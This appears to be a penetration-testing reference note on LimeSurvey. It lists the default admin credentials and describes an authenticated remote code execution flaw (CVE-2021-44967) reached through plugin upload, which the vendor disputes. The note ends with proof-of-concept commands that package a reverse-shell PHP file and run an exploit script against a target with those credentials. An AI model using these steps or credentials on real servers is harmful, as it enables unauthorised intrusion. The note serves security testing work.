LimeSurvey

LimeSurvey is an open-source web application designed for creating and managing online surveys. Built in PHP and typically backed by MySQL or PostgreSQL, it enables users to design complex questionnaires with a variety of question types, conditional logic, and customizable layouts. It supports user management, survey quotas, multilingual functionality, and detailed result export options, making it suitable for academic, commercial, and organizational data collection.

Default Credentials

The default credentials are: admin:password.

Authenticated RCE

LimeSurvey version 5.2.4 is affected by a RCE vulnerability (CVE-2021-44967) tied to the plugin upload and installation feature. The core issue lies in the ability to upload a plugin containing arbitrary PHP code, which is then executed by the application during installation. This behavior allows for direct code execution on the server hosting LimeSurvey.

The vendor disputes the classification of this as a vulnerability. According to the official stance, plugin installation is a feature restricted to superadmin users, and plugins are expected to include executable PHP code by design. From that perspective, the ability to upload and execute such code is part of the intended functionality and not considered a security flaw within the LimeSurvey threat model.

A working PoC is available:

# Modify as needed
$ nano revshell.php

# Create the archive
$ zip -r x7331.zip config.xml revshell.php
  adding: config.xml (deflated 58%)
  adding: revshell.php (deflated 68%)

# Modify as needed
$ nano exploit.py

# Execute the exploit
$ uv run exploit.py http://customers-survey.marketing.pg/ admin password 80